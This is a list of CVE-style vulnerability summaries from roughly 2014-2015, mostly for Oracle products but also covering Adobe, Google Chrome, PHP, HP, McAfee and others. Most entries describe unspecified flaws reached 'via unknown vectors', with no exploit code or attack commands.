Unspecified vulnerability in the Siebel Public Sector component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect integrity via unknown vectors related to Public Sector Portal.
Unspecified vulnerability in Oracle Java SE 5.0u75, 6u85, 7u72, and 8u25; Java SE Embedded 7u71 and 8u6; and JRockit R27.8.4 and R28.3.4 allows local users to affect integrity and availability via unknown vectors related to Hotspot.
Unspecified vulnerability in Oracle MySQL Server 5.5.40 and earlier and 5.6.21 and earlier allows remote attackers to affect availability via unknown vectors related to Server : Replication, a different vulnerability than CVE-2015-0381.
Unspecified vulnerability in Oracle MySQL Server 5.5.40 and earlier and 5.6.21 and earlier allows remote attackers to affect availability via unknown vectors related to Server : Replication, a different vulnerability than CVE-2015-0382.
Unspecified vulnerability in the Oracle Telecommunications Billing Integrator component in Oracle E-Business Suite 11.5.10.2, 12.0.4, 12.0.5, 12.0.6, 12.1.1, 12.1.2, 12.1.3, 12.2.2, 12.2.3, and 12.2.4 allows remote attackers to affect integrity via unknown vectors related to OA Based UI for Bill Summary.
Unspecified vulnerability in Oracle Sun Solaris 11 allows local users to affect availability via unknown vectors related to Libc.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox prior to 3.2.26, 4.0.28, 4.1.36, and 4.2.28 allows local users to affect availability via unknown vectors related to Core, a different vulnerability than CVE-2015-0418.
Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 11.1.1.8.0 allows remote attackers to affect integrity via unknown vectors related to Content Server.
Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows remote attackers to affect confidentiality via unknown vectors related to Network.
Unspecified vulnerability in Oracle MySQL Server 5.5.40 and earlier and 5.6.21 and earlier allows remote authenticated users to affect confidentiality via unknown vectors related to Server : Security : Privileges : Foreign Key.
Unspecified vulnerability in the OJVM component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle Containers for J2EE component in Oracle Fusion Middleware 10.1.3.5 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, and 12.1.0.1 allows remote authenticated users to affect integrity and availability via unknown vectors.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, and 12.1.0.1 allows remote authenticated users to affect integrity via unknown vectors, a different vulnerability than CVE-2013-5858.
Unspecified vulnerability in the Siebel UI Framework component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect integrity via unknown vectors related to AX/HI Web UI.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.1, 6.2, 6.3, 6.3.1, 6.3.2, 6.3.3, 6.3.4, and 6.3.5 allows remote attackers to affect availability via unknown vectors related to Security.
Unspecified vulnerability in the Siebel Core - EAI component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect confidentiality via unknown vectors related to Java Integration, a different vulnerability than CVE-2014-0369.
Unspecified vulnerability in the Siebel Core - Server Infrastructure component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the Siebel Core - EAI component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect availability via unknown vectors related to Integration Business Services.
Unspecified vulnerability in the Siebel Core EAI component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect availability via unknown vectors related to Integration Business Services.
Unspecified vulnerability in the BI Publisher (formerly XML Publisher) component in Oracle Fusion Middleware 11.1.1.7 allows remote attackers to affect confidentiality via unknown vectors related to BI Publisher Security.
Adobe Flash Player before 13.0.0.269 and 14.x through 16.x before 16.0.0.305 on Windows and OS X and before 11.2.202.442 on Linux allows attackers to cause a denial of service (NULL pointer dereference) or possibly have unspecified other impact via unknown vectors, a different vulnerability than CVE-2015-0325 and CVE-2015-0326.
Adobe Flash Player before 13.0.0.269 and 14.x through 16.x before 16.0.0.305 on Windows and OS X and before 11.2.202.442 on Linux allows attackers to cause a denial of service (NULL pointer dereference) or possibly have unspecified other impact via unknown vectors, a different vulnerability than CVE-2015-0325 and CVE-2015-0328.
Adobe Flash Player before 13.0.0.269 and 14.x through 16.x before 16.0.0.305 on Windows and OS X and before 11.2.202.442 on Linux allows attackers to cause a denial of service (NULL pointer dereference) or possibly have unspecified other impact via unknown vectors, a different vulnerability than CVE-2015-0326 and CVE-2015-0328.
Unspecified vulnerability in Adobe Flash Player through 13.0.0.262 and 14.x, 15.x, and 16.x through 16.0.0.287 on Windows and OS X and through 11.2.202.438 on Linux allows remote attackers to execute arbitrary code via unknown vectors, as exploited in the wild in January 2015.
Adobe Flash Player before 13.0.0.262 and 14.x through 16.x before 16.0.0.287 on Windows and OS X and before 11.2.202.438 on Linux does not properly restrict discovery of memory addresses, which allows attackers to bypass the ASLR protection mechanism on Windows, and have an unspecified impact on other platforms, via unknown vectors, as exploited in the wild in January 2015.
Unspecified vulnerability in Apache Qpid 0.30 and earlier allows remote attackers to bypass access restrictions on qpidd via unknown vectors, related to 0-10 connection handling.
Unspecified vulnerability in IBM Java 8 before SR1, 7 R1 before SR2 FP11, 7 before SR9, 6 R1 before SR8 FP4, 6 before SR16 FP4, and 5.0 before SR16 FP10 allows remote attackers to gain privileges via unknown vectors related to the Java Virtual Machine.
IBM Security SiteProtector System 3.0, 3.1.0 and 3.1.1 allows remote attackers to bypass intended security restrictions and consequently execute unspecified commands and obtain sensitive information via unknown vectors. IBM X-Force ID: 100927.
The DecodePSDPixels function in coders/psd.c in ImageMagick 6.8.9.9 allows remote attackers to have unspecified impact via unknown vectors.
The ReadPSDLayers function in coders/psd.c in ImageMagick 6.8.9.9 allows remote attackers to have unspecified impact via unknown vectors, related to "throwing of exceptions."
nw.js before 0.11.5 can simulate user input events in a normal frame, which allows remote attackers to have unspecified impact via unknown vectors.
Unspecified vulnerability in the Ninja Forms plugin before 2.8.10 for WordPress has unknown impact and remote attack vectors related to admin users.
Multiple cross-site request forgery (CSRF) vulnerabilities in Roundcube Webmail before 1.0.4 allow remote attackers to hijack the authentication of unspecified victims via unknown vectors, related to (1) address book operations or the (2) ACL or (3) Managesieve plugins.
The frontend rendering component in TYPO3 4.5.x before 4.5.39, 4.6.x through 6.2.x before 6.2.9, and 7.x before 7.0.2, when config.prefixLocalAnchors is set and using a homepage with links that only contain anchors, allows remote attackers to change URLs to arbitrary domains for those links via unknown vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in unspecified sub modules in the Open Atrium module 7.x-2.x before 7.x-2.26 for Drupal allow remote attackers to hijack the authentication of unknown victims via vectors related to menu callbacks.
Heap-based buffer overflow in the GDB debugger module in Hex-Rays IDA Pro before 6.6 cumulative fix 2014-12-24 allows remote GDB servers to have unspecified impact via unknown vectors.
** DISPUTED ** The apprentice_load function in libmagic/apprentice.c in the Fileinfo component in PHP through 5.6.4 attempts to perform a free operation on a stack-based character array, which allows remote attackers to cause a denial of service (memory corruption or application crash) or possibly have unspecified other impact via unknown vectors.  NOTE: this is disputed by the vendor because the standard erealloc behavior makes the free operation unreachable.
Double free vulnerability in the zend_ts_hash_graceful_destroy function in zend_ts_hash.c in the Zend Engine in PHP through 5.5.20 and 5.6.x through 5.6.4 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Multiple stack-based buffer overflows in unspecified DLL files in Advantech WebAccess before 8.0.1 allow remote attackers to execute arbitrary code via unknown vectors.
Multiple heap-based buffer overflows in Adobe Reader and Acrobat 10.x before 10.1.14 and 11.x before 11.0.11 on Windows and OS X allow attackers to execute arbitrary code via unknown vectors.
Format string vulnerability in the yyerror function in lib/cgraph/scan.l in Graphviz allows remote attackers to have unspecified impact via format string specifiers in unknown vectors, which are not properly handled in an error string.
Multiple unspecified vulnerabilities in the preview system in ownCloud 6.x before 6.0.6 and 7.x before 7.0.3 allow remote attackers to read arbitrary files via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 35.0 and SeaMonkey before 2.32 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in SAP Internet Communication Manager (ICM), as used in SAP NetWeaver 7.02 and 7.3, allows remote attackers to cause a denial of service (process termination) via unknown vectors.
Citrix NetScaler Application Delivery Controller and NetScaler Gateway 10.5.50.10 before 10.5-52.11, 10.1.122.17 before 10.1-129.11, and 10.1-120.1316.e before 10.1-129.1105.e, when using unspecified configurations, allows remote authenticated users to access "network resources" of other users via unknown vectors.
McAfee Network Data Loss Prevention (NDLP) before 9.2.2 allows local users to bypass intended restriction on unspecified functionality via unknown vectors.
Unspecified vulnerability in McAfee Network Data Loss Prevention before (NDLP) before 9.3 allows local users to obtain sensitive information and impact integrity via unknown vectors, related to partition mounting.
Unspecified vulnerability in McAfee Network Data Loss Prevention (NDLP) before 9.3 allows remote attackers to obtain sensitive information, affect integrity, or cause a denial of service via unknown vectors, related to simultaneous logins.
Cross-site request forgery (CSRF) vulnerability in McAfee Network Data Loss Prevention (NDLP) before 9.3 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in McAfee Network Data Loss Prevention (NDLP) before 9.2.2 allows local users to read arbitrary files via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in CA Cloud Service Management (CSM) before Summer 2014 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
An unspecified JavaScript API in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to obtain sensitive information via unknown vectors, a different vulnerability than CVE-2014-8448.
An unspecified JavaScript API in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to obtain sensitive information via unknown vectors, a different vulnerability than CVE-2014-8451.
Unspecified vulnerability in the management portal in ARRIS VAP2500 before FW08.41 allows remote attackers to execute arbitrary commands via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in CA Release Automation (formerly iTKO LISA Release Automation) before 4.7.1 b448 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
XML external entity (XXE) in the RPC interface in Spacewalk and Red Hat Network (RHN) Satellite 5.7 and earlier allows remote attackers to read arbitrary files and possibly have other unspecified impact via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in doorkeeper before 1.4.1 allows remote attackers to hijack the authentication of unspecified victims for requests that read a user OAuth authorization code via unknown vectors.
The agent in Thermostat before 1.0.6, when using unspecified configurations, allows local users to obtain the JMX management URLs of all local Java virtual machines and gain privileges via unknown vectors.
The default authorization constrains in KIE Workbench 6.0.x allows remote authenticated users to read or write to arbitrary files, bypass intended access restrictions, and possibly have other unspecified impact via unknown vectors.
Multiple unspecified vulnerabilities in Google V8 before 3.28.71.15, as used in Google Chrome before 38.0.2125.101, allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
The Fonts implementation in Google Chrome before 40.0.2214.91 does not initialize memory for a data structure, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
The Fonts implementation in Google Chrome before 40.0.2214.91 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 39.0.2171.65 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Buffer overflow in Skia, as used in Google Chrome before 39.0.2171.65, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in HP ArcSight Enterprise Security Manager (ESM) before 6.8c have unknown impact and remote attack vectors.
Multiple unspecified vulnerabilities in HP ArcSight Logger before 6.0P1 have unknown impact and remote authenticated attack vectors.
Unspecified vulnerability in HP SiteScope 11.1x and 11.2x allows remote authenticated users to gain privileges via unknown vectors.
Unspecified vulnerability in the kernel in HP HP-UX B.11.31 allows local users to cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Integrated Lights-Out (iLO) firmware 2 before 2.27 and 4 before 2.03 and iLO Chassis Management (CM) firmware before 1.30 allows remote attackers to gain privileges, execute arbitrary code, or cause a denial of service via unknown vectors.
Unspecified vulnerability on the HP LaserJet CM3530 Multifunction Printer CC519A and CC520A with firmware before 53.236.2 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) before 3.2.3 on HP-UX B.11.23, and before 3.2.8 on HP-UX B.11.31, allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in the folder framework in the Enfold theme before 3.0.1 for WordPress has unknown impact and attack vectors.
Unspecified vulnerability in ARROWS Me F-11D allows physically proximate attackers to read or modify flash memory via unknown vectors.
Multiple unspecified vulnerabilities in the Syslink driver for Texas Instruments OMAP mobile processor, as used on NTT DOCOMO ARROWS Tab LTE F-01D, ARROWS X LTE F-05D, Disney Mobile on docomo F-08D, REGZA Phone T-01D, and PRADA phone by LG L-02D; and SoftBank SHARP handsets 102SH allow local users to execute arbitrary code or read kernel memory via unknown vectors related to userland data and "improper data validation."
GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.  NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.
Unspecified vulnerability in the management interface in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway 10.x before 10.1-129.11 and 10.5 before 10.5-50.10 allows remote attackers to execute arbitrary code via unknown vectors.
Aruba Networks ClearPass before 6.3.6 and 6.4.x before 6.4.1 does not properly restrict access to unspecified administrative functions, which allows remote attackers to bypass authentication and execute administrative actions via unknown vectors.
Unspecified vulnerability in Oracle Java SE 6u85, 7u72, and 8u25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot.
Unspecified vulnerability in Oracle Sun Solaris 11 allows local users to affect availability via unknown vectors related to File System, a different vulnerability than CVE-2014-6570 and CVE-2015-0397.
Unspecified vulnerability in the Siebel Core - Common Components component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Email.
Unspecified vulnerability in the Siebel UI Framework component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect integrity via unknown vectors related to Portal Framework.
Unspecified vulnerability in the Oracle iLearning component in Oracle iLearning 6.0 and 6.1 allows remote attackers to affect confidentiality via unknown vectors related to Learner Pages.
Unspecified vulnerability in the Java SE component in Oracle Java SE 5.0u75, 6u85, 7u72, and 8u25 allows remote attackers to affect confidentiality via unknown vectors related to 2D, a different vulnerability than CVE-2014-6585.
Unspecified vulnerability in Oracle Java SE 6u85, 7u72, and 8u25 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 9.1 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Time and Labor.
Unspecified vulnerability in Oracle Java SE 5.0u75, 6u85, 7u72, and 8u25 allows remote attackers to affect confidentiality via unknown vectors related to 2D, a different vulnerability than CVE-2014-6591.
Unspecified vulnerability in the Integrated Lights Out Manager (ILOM) component in Oracle Sun Systems Products Suite ILOM before 3.2.4 allows remote authenticated users to affect confidentiality via unknown vectors related to Backup Restore.
Unspecified vulnerability in the Oracle Marketing component in Oracle E-Business Suite 11.5.10.2, 12.0.4, 12.0.5, 12.0.6, 12.1.1, 12.1.2, and 12.1.3. allows remote attackers to affect confidentiality and integrity via unknown vectors related to Audience.
Unspecified vulnerability in the Oracle HCM Configuration Workbench component in Oracle E-Business Suite 11.5.10.2, 12.0.4, 12.0.5, 12.0.6, 12.1.1, 12.1.2, 12.1.3, 12.2.2, 12.2.3, and 12.2.4 allows remote attackers to affect confidentiality via unknown vectors related to Rapid Implementation.
Unspecified vulnerability in the Oracle Customer Intelligence component in Oracle E-Business Suite 11.5.10.2, 12.0.4, 12.0.5, 12.0.6, 12.1.1, 12.1.2, 12.1.3, 12.2.2, 12.2.3, and 12.2.4 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Extract/Load Programs.
Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.7 and 11.1.2.2 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.52 and 8.53 allows remote authenticated users to affect confidentiality via unknown vectors related to Integration Broker.
Unspecified vulnerability in the XML Developer's Kit for C component in Oracle Database Server 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors.  NOTE: the previous information is from the January 2015 CPU. Oracle has not commented on the original researcher's claim that this is an XML external entity (XXE) vulnerability in the XML parser, which allows attackers to conduct internal port scanning, perform SSRF attacks, or cause a denial of service via a crafted (1) http: or (2) ftp: URI.
Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows remote attackers to affect availability via unknown vectors related to Network, a different vulnerability than CVE-2004-0230.
Unspecified vulnerability in the Oracle Agile PLM for Process component in Oracle Supply Chain Products Suite 6.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Testing Protocol Library.
Unspecified vulnerability in the Enterprise Manager Ops Center component in Oracle Enterprise Manager Grid Control 11.1.3 and 12.1.4 allows remote attackers to affect integrity via unknown vectors related to User Interface Framework.
Unspecified vulnerability in the Oracle Customer Interaction History component in Oracle E-Business Suite 12.0.4, 12.0.5, 12.0.6, 12.1.1, 12.1.2, 12.1.3, 12.2.2, 12.2.3, and 12.2.4 allows remote attackers to affect confidentiality and integrity via unknown vectors related to List of Values.
Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.7.0, 12.1.2.0, and 12.1.3.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Web Listener, a different vulnerability than CVE-2011-1944.
Unspecified vulnerability in Oracle Sun Solaris 11 allows local users to affect availability via unknown vectors related to File System, a different vulnerability than CVE-2014-6600 and CVE-2015-0397.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: the previous information is from the January 2015 CPU. Oracle has not commented on the researcher's claim that this is a stack-based buffer overflow in DBMS_AW.EXECUTE, which allows code execution via a long Current Directory Alias (CDA) command.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.53 allows remote authenticated users to affect integrity via unknown vectors related to Portal.
Unspecified vulnerability in the Java VM component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2014-4294, CVE-2014-4295, and CVE-2014-6538.
Unspecified vulnerability in Oracle Java SE 8u20 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
Unspecified vulnerability in the Oracle Payments component in Oracle E-Business Suite 12.0.4, 12.0.6, 12.1.1, 12.1.2, 12.1.3, 12.2.2, 12.2.3, and 12.2.4 allows remote attackers to affect confidentiality via unknown vectors related to Separate Remittance Advice.
Unspecified vulnerability in the Java VM component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2014-6453, CVE-2014-6467, and CVE-2014-6545.
Unspecified vulnerability in Oracle Java SE 5.0u71, 6u81, 7u67, and 8u20; Java SE Embedded 7u60; and JRockit R27.8.3 and JRockit R28.3.3 allows remote attackers to affect integrity via unknown vectors related to Security.
Unspecified vulnerability in the Application Performance Management component in Oracle Enterprise Manager Grid Control before 12.1.0.6.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to End User Experience Management.
Unspecified vulnerability in the Oracle Access Manager component in Oracle Fusion Middleware 11.1.2.1 and 11.1.2.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Admin Console.
Unspecified vulnerability in the Oracle Access Manager component in Oracle Fusion Middleware 11.1.1.5 and 11.1.1.7 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Admin Console.
Unspecified vulnerability in the Oracle Access Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote attackers to affect integrity via unknown vectors related to Admin Console.
Unspecified vulnerability in the Oracle Applications Object Library component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect integrity via unknown vectors related to iHelp.
Unspecified vulnerability in Oracle Java SE 8u25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
Unspecified vulnerability in the JPublisher component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2014-4290, CVE-2014-4291, CVE-2014-4292, CVE-2014-4293, CVE-2014-4296, CVE-2014-4297, CVE-2014-4310, and CVE-2014-6477.
Unspecified vulnerability in the JPublisher component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Java VM component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2014-6453, CVE-2014-6467, and CVE-2014-6560.
Unspecified vulnerability in the JDBC component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, and 12.1.0.1 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2014-4289.
Unspecified vulnerability in the SQLJ component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2014-4298, CVE-2014-4299, CVE-2014-4300, CVE-2014-6452, and CVE-2014-6454.
Unspecified vulnerability in the Java VM component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2014-4294, CVE-2014-4295, and CVE-2014-6563.
Unspecified vulnerability in the Java VM component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Agile PLM component in Oracle Supply Chain Products Suite 9.3.3 allows remote authenticated users to affect integrity via unknown vectors related to Security.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.1 and 6.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Security.
Unspecified vulnerability in Oracle Java SE 6u81, 7u67, and 8u20 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2014-4288, CVE-2014-6493, and CVE-2014-6503.
Unspecified vulnerability in Oracle Java SE 5.0u71, 6u81, 7u67, and 8u20, and Java SE Embedded 7u60, allows remote attackers to affect confidentiality via unknown vectors related to Libraries.
Unspecified vulnerability in the Siebel Core - System Management component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Server Infrastructure.
Unspecified vulnerability in Oracle Java SE 7u67 and 8u20 allows remote attackers to affect integrity via unknown vectors related to Deployment, a different vulnerability than CVE-2014-6476.
Unspecified vulnerability in the Oracle Directory Server Enterprise Edition component in Oracle Fusion Middleware 7.0 allows remote attackers to affect integrity via unknown vectors related to Admin Console.
Unspecified vulnerability in the Oracle Web Applications Desktop Integrator component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.3, 12.2.2, 12.2.3, and 12.2.4 allows remote authenticated users to affect integrity via unknown vectors related to Templates.
Unspecified vulnerability in Oracle Solaris 10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Kernel.
Unspecified vulnerability in Oracle Java SE 7u67 and 8u20, and Java SE Embedded 7u60, allows remote attackers to affect integrity via unknown vectors related to Hotspot.
Unspecified vulnerability in Oracle Java SE 6u81, 7u67, and 8u20 allows remote attackers to affect integrity via unknown vectors related to Deployment.
Unspecified vulnerability in the PL/SQL component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, and 12.1.0.1 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in Oracle Java SE 5.0u71, 6u81, 7u67, and 8u20; Java SE Embedded 7u60; and JRockit R27.8.3 and R28.3.3 allows remote attackers to affect integrity via unknown vectors related to Libraries.
Unspecified vulnerability in Oracle Java SE 5.0u71, 6u81, 7u67, and 8u20 allows remote attackers to affect confidentiality via unknown vectors related to 2D.
Unspecified vulnerability in Oracle Solaris 11 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Power Management Utility.
Unspecified vulnerability in Oracle Solaris 10 allows local users to affect availability via unknown vectors related to Kernel.
Unspecified vulnerability in Oracle Java SE 5.0u71, 6u81, 7u67, and 8u20, and Java SE Embedded 7u60, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
Unspecified vulnerability in Oracle Java SE 5.0u71, 6u81, and 7u67, and Java SE Embedded 7u60, allows remote attackers to affect confidentiality via unknown vectors related to Hotspot.
Unspecified vulnerability in Oracle Java SE 6u81, 7u67, and 8u20 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2014-4288, CVE-2014-6493, and CVE-2014-6532.
Unspecified vulnerability in Oracle Java SE 5.0u71, 6u81, 7u67, and 8u20, and Java SE Embedded 7u60, allows remote attackers to affect integrity via unknown vectors related to Libraries.
Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0, 10.3.6.0, 12.1.1.0, 12.1.2.0, and 12.1.3.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to WebLogic Tuxedo Connector.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.1, 6.2, 6.3, 6.3.1, 6.3.2, 6.3.3, 6.3.4, and 6.3.5 allows remote attackers to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in Oracle Sun Solaris 11 allows local users to affect availability via unknown vectors related to Kernel.
Unspecified vulnerability in Oracle Java SE 6u81, 7u67, and 8u20 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2014-4288, CVE-2014-6503, and CVE-2014-6532.
Unspecified vulnerability in Oracle Java SE 6u81, 7u67, and 8u20, when running on Firefox, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in the Enterprise Manager for Oracle Database component in Oracle Enterprise Manager Grid Control EM Base Platform: 10.2.0.5, 11.1.0.1 EM DB Control: 11.1.0.7, 11.2.0.3, 11.2.0.4 EM Plugin for DB: 12.1.0.4, 12.1.0.5, and 12.1.0.6 allows remote authenticated users to affect integrity via unknown vectors related to Content Management.
Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.
Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 9.2 allows remote authenticated users to affect integrity via unknown vectors related to Talent Acquisition Manager - Security.
Unspecified vulnerability in Oracle Java SE 8u20 and JavaFX 2.2.65 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Application Express component in Oracle Database Server before 4.2.6 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise PT PeopleTools component in Oracle PeopleSoft Products 8.53 and 8.54 allows remote authenticated users to affect integrity via unknown vectors related to Updates Change Assistant.
Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Systems Products Suite 3.3 and 4.1 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to System management.
Unspecified vulnerability in the JPublisher component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2014-4290, CVE-2014-4291, CVE-2014-4292, CVE-2014-4293, CVE-2014-4296, CVE-2014-4297, CVE-2014-4310, and CVE-2014-6547.  NOTE: this issue was originally mapped to CVE-2014-4301, but CVE-2014-4301 is for an unrelated vulnerability.
Unspecified vulnerability in Oracle Java SE 7u67 and 8u20 allows remote attackers to affect integrity via unknown vectors related to Deployment, a different vulnerability than CVE-2014-6527.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.52, 8.53, and 8.54 allows remote authenticated users to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Zone Framework.
